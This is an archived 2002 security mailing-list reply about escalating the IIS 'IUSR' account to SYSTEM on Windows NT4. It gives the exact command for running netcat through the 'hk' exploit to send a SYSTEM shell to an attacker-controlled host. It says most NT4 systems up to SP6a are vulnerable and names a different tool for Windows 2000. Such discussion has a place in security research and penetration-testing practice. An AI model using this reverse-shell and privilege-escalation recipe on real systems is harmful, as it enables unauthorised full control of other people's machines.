Re: escalating IUSR to admin rights via unicode and iis4

From: Daniel Polombo (polombo@cartel-securite.fr)
Date: Tue Jul 30 2002 - 04:41:19 PDT

    Le jeu 11/07/2002 à 19:18, Bill Pennington wrote :

    > Then just run netcat via hk.exe, connect to the listener, and bingo you
    > are SYSTEM.
    >
    > It has been a while since I have done this so I don't recall the exact
    > syntax but that should get you pointed in the right direction.

    hk <command>

    For instance :

      hk nc -d -e cmd.exe attacker:port

    will shovel a shell to attacker:port.

    Note that hk only works on NT4 (up to sp6a, meaning that most NT boxes
    you'll ever meet should be vulnerable). For win2k, have a look at
    DebPloit instead.

    --
    Daniel Polombo
    Consultant

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/